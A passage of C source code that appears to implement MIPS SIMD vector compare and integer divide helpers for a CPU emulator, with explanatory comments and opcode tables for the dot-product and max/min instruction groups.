pwd->h[3] = msa_ceq_h(pws->h[3], pwt->h[3]); pwd->h[4] = msa_ceq_h(pws->h[4], pwt->h[4]); pwd->h[5] = msa_ceq_h(pws->h[5], pwt->h[5]); pwd->h[6] = msa_ceq_h(pws->h[6], pwt->h[6]); pwd->h[7] = msa_ceq_h(pws->h[7], pwt->h[7]); } static inline int32_t msa_ceq_w(int32_t arg1, int32_t arg2) { return arg1 == arg2 ? 
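/*
 * Every compare helper returns -1 (all bits set) for true and 0 for
 * false, so each destination element becomes an all-ones/all-zeros
 * mask that later bitwise operations can consume directly.
 */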
-1 : 0; } void helper_msa_ceq_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_ceq_w(pws->w[0], pwt->w[0]); pwd->w[1] = msa_ceq_w(pws->w[1], pwt->w[1]); pwd->w[2] = msa_ceq_w(pws->w[2], pwt->w[2]); pwd->w[3] = msa_ceq_w(pws->w[3], pwt->w[3]); } static inline int64_t msa_ceq_d(int64_t arg1, int64_t arg2) { return arg1 == arg2 ? -1 : 0; } void helper_msa_ceq_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_ceq_d(pws->d[0], pwt->d[0]); pwd->d[1] = msa_ceq_d(pws->d[1], pwt->d[1]); } static inline int64_t msa_cle_s_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 <= arg2 ? -1 : 0; } void helper_msa_cle_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_cle_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_cle_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_cle_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_cle_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_cle_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_cle_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_cle_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_cle_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_cle_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_cle_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_cle_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_cle_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_cle_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_cle_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_cle_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_cle_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_cle_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_cle_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_cle_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_cle_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_cle_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_cle_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_cle_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_cle_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_cle_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_cle_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_cle_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_cle_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_cle_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_cle_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_cle_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_cle_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_cle_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_cle_u_df(uint32_t df, 
int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return u_arg1 <= u_arg2 ? -1 : 0; } void helper_msa_cle_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_cle_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_cle_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_cle_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_cle_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_cle_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_cle_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_cle_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_cle_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_cle_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_cle_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_cle_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_cle_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_cle_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_cle_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_cle_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_cle_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_cle_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_cle_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_cle_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_cle_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_cle_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_cle_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_cle_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_cle_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_cle_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_cle_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_cle_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_cle_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_cle_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_cle_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_cle_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_cle_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_cle_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_clt_s_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 < arg2 ? -1 : 0; } static inline int8_t msa_clt_s_b(int8_t arg1, int8_t arg2) { return arg1 < arg2 ? 
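/*
 * CEQ and CLT_S use dedicated fixed-width inlines (msa_ceq_b/h/w/d,
 * msa_clt_s_b/h/w/d) rather than the df-dispatched *_df pattern used
 * by the other groups; the computed results are identical.
 */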
-1 : 0; } void helper_msa_clt_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_clt_s_b(pws->b[0], pwt->b[0]); pwd->b[1] = msa_clt_s_b(pws->b[1], pwt->b[1]); pwd->b[2] = msa_clt_s_b(pws->b[2], pwt->b[2]); pwd->b[3] = msa_clt_s_b(pws->b[3], pwt->b[3]); pwd->b[4] = msa_clt_s_b(pws->b[4], pwt->b[4]); pwd->b[5] = msa_clt_s_b(pws->b[5], pwt->b[5]); pwd->b[6] = msa_clt_s_b(pws->b[6], pwt->b[6]); pwd->b[7] = msa_clt_s_b(pws->b[7], pwt->b[7]); pwd->b[8] = msa_clt_s_b(pws->b[8], pwt->b[8]); pwd->b[9] = msa_clt_s_b(pws->b[9], pwt->b[9]); pwd->b[10] = msa_clt_s_b(pws->b[10], pwt->b[10]); pwd->b[11] = msa_clt_s_b(pws->b[11], pwt->b[11]); pwd->b[12] = msa_clt_s_b(pws->b[12], pwt->b[12]); pwd->b[13] = msa_clt_s_b(pws->b[13], pwt->b[13]); pwd->b[14] = msa_clt_s_b(pws->b[14], pwt->b[14]); pwd->b[15] = msa_clt_s_b(pws->b[15], pwt->b[15]); } static inline int16_t msa_clt_s_h(int16_t arg1, int16_t arg2) { return arg1 < arg2 ? -1 : 0; } void helper_msa_clt_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_clt_s_h(pws->h[0], pwt->h[0]); pwd->h[1] = msa_clt_s_h(pws->h[1], pwt->h[1]); pwd->h[2] = msa_clt_s_h(pws->h[2], pwt->h[2]); pwd->h[3] = msa_clt_s_h(pws->h[3], pwt->h[3]); pwd->h[4] = msa_clt_s_h(pws->h[4], pwt->h[4]); pwd->h[5] = msa_clt_s_h(pws->h[5], pwt->h[5]); pwd->h[6] = msa_clt_s_h(pws->h[6], pwt->h[6]); pwd->h[7] = msa_clt_s_h(pws->h[7], pwt->h[7]); } static inline int32_t msa_clt_s_w(int32_t arg1, int32_t arg2) { return arg1 < arg2 ? -1 : 0; } void helper_msa_clt_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_clt_s_w(pws->w[0], pwt->w[0]); pwd->w[1] = msa_clt_s_w(pws->w[1], pwt->w[1]); pwd->w[2] = msa_clt_s_w(pws->w[2], pwt->w[2]); pwd->w[3] = msa_clt_s_w(pws->w[3], pwt->w[3]); } static inline int64_t msa_clt_s_d(int64_t arg1, int64_t arg2) { return arg1 < arg2 ? -1 : 0; } void helper_msa_clt_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_clt_s_d(pws->d[0], pwt->d[0]); pwd->d[1] = msa_clt_s_d(pws->d[1], pwt->d[1]); } static inline int64_t msa_clt_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return u_arg1 < u_arg2 ? 
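/*
 * UNSIGNED() masks the sign-extended element back down to its df width,
 * making the comparison genuinely unsigned.  Worked example (DF_BYTE):
 * 0x80 arrives sign-extended as -128, UNSIGNED() turns it into 128, so
 * CLT_U.B on (0x80, 0x7f) is false because 128 < 127 fails.
 */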
-1 : 0; } void helper_msa_clt_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_clt_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_clt_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_clt_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_clt_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_clt_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_clt_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_clt_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_clt_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_clt_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_clt_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_clt_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_clt_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_clt_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_clt_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_clt_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_clt_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_clt_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_clt_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_clt_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_clt_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_clt_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_clt_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_clt_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_clt_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_clt_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_clt_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_clt_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_clt_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_clt_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_clt_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_clt_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_clt_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_clt_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Int Divide * ---------- * * +---------------+----------------------------------------------------------+ * | DIV_S.B | Vector Signed Divide (byte) | * | DIV_S.H | Vector Signed Divide (halfword) | * | DIV_S.W | Vector Signed Divide (word) | * | DIV_S.D | Vector Signed Divide (doubleword) | * | DIV_U.B | Vector Unsigned Divide (byte) | * | DIV_U.H | Vector Unsigned Divide (halfword) | * | DIV_U.W | Vector Unsigned Divide (word) | * | DIV_U.D | Vector Unsigned Divide (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_div_s_df(uint32_t df, int64_t arg1, int64_t arg2) { if (arg1 == DF_MIN_INT(df) && arg2 == -1) { return DF_MIN_INT(df); } return arg2 ? arg1 / arg2 : arg1 >= 0 ? 
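/*
 * Two edge cases: DF_MIN_INT(df) / -1 is handled first because for
 * DF_DOUBLE the quotient would overflow int64_t (undefined behaviour in
 * C), and for narrower widths it wraps back to DF_MIN_INT anyway;
 * division by zero then yields -1 for a non-negative dividend and 1 for
 * a negative one, a fixed convention for a result the hardware leaves
 * unpredictable.
 */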
-1 : 1; } void helper_msa_div_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_div_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_div_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_div_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_div_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_div_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_div_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_div_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_div_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_div_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_div_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_div_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_div_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_div_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_div_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_div_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_div_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_div_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_div_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_div_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_div_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_div_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_div_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_div_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_div_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_div_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_div_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_div_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_div_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_div_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_div_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_div_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_div_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_div_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_div_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return arg2 ? 
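/* Unsigned division by zero likewise yields -1, i.e. an all-ones element. */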
u_arg1 / u_arg2 : -1; }

void helper_msa_div_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt)
{
    wr_t *pwd = &(env->active_fpu.fpr[wd].wr);
    wr_t *pws = &(env->active_fpu.fpr[ws].wr);
    wr_t *pwt = &(env->active_fpu.fpr[wt].wr);
    pwd->b[0] = msa_div_u_df(DF_BYTE, pws->b[0], pwt->b[0]);
    pwd->b[1] = msa_div_u_df(DF_BYTE, pws->b[1], pwt->b[1]);
    pwd->b[2] = msa_div_u_df(DF_BYTE, pws->b[2], pwt->b[2]);
    pwd->b[3] = msa_div_u_df(DF_BYTE, pws->b[3], pwt->b[3]);
    pwd->b[4] = msa_div_u_df(DF_BYTE, pws->b[4], pwt->b[4]);
    pwd->b[5] = msa_div_u_df(DF_BYTE, pws->b[5], pwt->b[5]);
    pwd->b[6] = msa_div_u_df(DF_BYTE, pws->b[6], pwt->b[6]);
    pwd->b[7] = msa_div_u_df(DF_BYTE, pws->b[7], pwt->b[7]);
    pwd->b[8] = msa_div_u_df(DF_BYTE, pws->b[8], pwt->b[8]);
    pwd->b[9] = msa_div_u_df(DF_BYTE, pws->b[9], pwt->b[9]);
    pwd->b[10] = msa_div_u_df(DF_BYTE, pws->b[10], pwt->b[10]);
    pwd->b[11] = msa_div_u_df(DF_BYTE, pws->b[11], pwt->b[11]);
    pwd->b[12] = msa_div_u_df(DF_BYTE, pws->b[12], pwt->b[12]);
    pwd->b[13] = msa_div_u_df(DF_BYTE, pws->b[13], pwt->b[13]);
    pwd->b[14] = msa_div_u_df(DF_BYTE, pws->b[14], pwt->b[14]);
    pwd->b[15] = msa_div_u_df(DF_BYTE, pws->b[15], pwt->b[15]);
}

void helper_msa_div_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt)
{
    wr_t *pwd = &(env->active_fpu.fpr[wd].wr);
    wr_t *pws = &(env->active_fpu.fpr[ws].wr);
    wr_t *pwt = &(env->active_fpu.fpr[wt].wr);
    pwd->h[0] = msa_div_u_df(DF_HALF, pws->h[0], pwt->h[0]);
    pwd->h[1] = msa_div_u_df(DF_HALF, pws->h[1], pwt->h[1]);
    pwd->h[2] = msa_div_u_df(DF_HALF, pws->h[2], pwt->h[2]);
    pwd->h[3] = msa_div_u_df(DF_HALF, pws->h[3], pwt->h[3]);
    pwd->h[4] = msa_div_u_df(DF_HALF, pws->h[4], pwt->h[4]);
    pwd->h[5] = msa_div_u_df(DF_HALF, pws->h[5], pwt->h[5]);
    pwd->h[6] = msa_div_u_df(DF_HALF, pws->h[6], pwt->h[6]);
    pwd->h[7] = msa_div_u_df(DF_HALF, pws->h[7], pwt->h[7]);
}

void helper_msa_div_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt)
{
    wr_t *pwd = &(env->active_fpu.fpr[wd].wr);
    wr_t *pws = &(env->active_fpu.fpr[ws].wr);
    wr_t *pwt = &(env->active_fpu.fpr[wt].wr);
    pwd->w[0] = msa_div_u_df(DF_WORD, pws->w[0], pwt->w[0]);
    pwd->w[1] = msa_div_u_df(DF_WORD, pws->w[1], pwt->w[1]);
    pwd->w[2] = msa_div_u_df(DF_WORD, pws->w[2], pwt->w[2]);
    pwd->w[3] = msa_div_u_df(DF_WORD, pws->w[3], pwt->w[3]);
}

void helper_msa_div_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt)
{
    wr_t *pwd = &(env->active_fpu.fpr[wd].wr);
    wr_t *pws = &(env->active_fpu.fpr[ws].wr);
    wr_t *pwt = &(env->active_fpu.fpr[wt].wr);
    pwd->d[0] = msa_div_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]);
    pwd->d[1] = msa_div_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]);
}

/*
 * Int Dot Product
 * ---------------
 *
 * +---------------+----------------------------------------------------------+
 * | DOTP_S.H      | Vector Signed Dot Product (halfword)                     |
 * | DOTP_S.W      | Vector Signed Dot Product (word)                         |
 * | DOTP_S.D      | Vector Signed Dot Product (doubleword)                   |
 * | DOTP_U.H      | Vector Unsigned Dot Product (halfword)                   |
 * | DOTP_U.W      | Vector Unsigned Dot Product (word)                       |
 * | DOTP_U.D      | Vector Unsigned Dot Product (doubleword)                 |
 * | DPADD_S.H     | Vector Signed Dot Product and Add (halfword)             |
 * | DPADD_S.W     | Vector Signed Dot Product and Add (word)                 |
 * | DPADD_S.D     | Vector Signed Dot Product and Add (doubleword)           |
 * | DPADD_U.H     | Vector Unsigned Dot Product and Add (halfword)           |
 * | DPADD_U.W     | Vector Unsigned Dot Product and Add (word)               |
 * | DPADD_U.D     | Vector Unsigned Dot Product and Add (doubleword)         |
 * | DPSUB_S.H     | Vector Signed Dot Product and Subtract (halfword)        |
 * | DPSUB_S.W     | Vector Signed Dot Product and Subtract (word)            |
 * | DPSUB_S.D     | Vector Signed Dot Product and Subtract (doubleword)      |
 * | DPSUB_U.H     | Vector Unsigned Dot Product and Subtract (halfword)      |
 * | DPSUB_U.W     | Vector Unsigned Dot Product and Subtract (word)          |
 * | DPSUB_U.D     | Vector Unsigned Dot Product and Subtract (doubleword)    |
 * +---------------+----------------------------------------------------------+
 */

/* TODO: insert Int Dot Product group helpers here */
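/*
 * Illustrative sketch of the element operation behind the DOTP_S group
 * (the full helper set is still to be inserted, per the TODO above):
 * each destination element is the product of the even halves of the two
 * source elements plus the product of their odd halves, reusing the
 * SIGNED_EVEN/SIGNED_ODD extraction macros defined earlier.  The DPADD
 * and DPSUB variants would accumulate this value into, or subtract it
 * from, the existing destination element.
 */
static inline int64_t msa_dotp_s_df(uint32_t df, int64_t arg1, int64_t arg2)
{
    return (SIGNED_EVEN(arg1, df) * SIGNED_EVEN(arg2, df)) +
           (SIGNED_ODD(arg1, df) * SIGNED_ODD(arg2, df));
}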
/*
 * Int Max Min
 * -----------
 *
 * +---------------+----------------------------------------------------------+
 * | MAX_A.B       | Vector Maximum Based on Absolute Value (byte)            |
 * | MAX_A.H       | Vector Maximum Based on Absolute Value (halfword)        |
 * | MAX_A.W       | Vector Maximum Based on Absolute Value (word)            |
 * | MAX_A.D       | Vector Maximum Based on Absolute Value (doubleword)      |
 * | MAX_S.B       | Vector Signed Maximum (byte)                             |
 * | MAX_S.H       | Vector Signed Maximum (halfword)                         |
 * | MAX_S.W       | Vector Signed Maximum (word)                             |
 * | MAX_S.D       | Vector Signed Maximum (doubleword)                       |
 * | MAX_U.B       | Vector Unsigned Maximum (byte)                           |
 * | MAX_U.H       | Vector Unsigned Maximum (halfword)                       |
 * | MAX_U.W       | Vector Unsigned Maximum (word)                           |
 * | MAX_U.D       | Vector Unsigned Maximum (doubleword)                     |
 * | MIN_A.B       | Vector Minimum Based on Absolute Value (byte)            |
 * | MIN_A.H       | Vector Minimum Based on Absolute Value (halfword)        |
 * | MIN_A.W       | Vector Minimum Based on Absolute Value (word)            |
 * | MIN_A.D       | Vector Minimum Based on Absolute Value (doubleword)      |
 * | MIN_S.B       | Vector Signed Minimum (byte)                             |
 * | MIN_S.H       | Vector Signed Minimum (halfword)                         |
 * | MIN_S.W       | Vector Signed Minimum (word)                             |
 * | MIN_S.D       | Vector Signed Minimum (doubleword)                       |
 * | MIN_U.B       | Vector Unsigned Minimum (byte)                           |
 * | MIN_U.H       | Vector Unsigned Minimum (halfword)                       |
 * | MIN_U.W       | Vector Unsigned Minimum (word)                           |
 * | MIN_U.D       | Vector Unsigned Minimum (doubleword)                     |
 * +---------------+----------------------------------------------------------+
 */

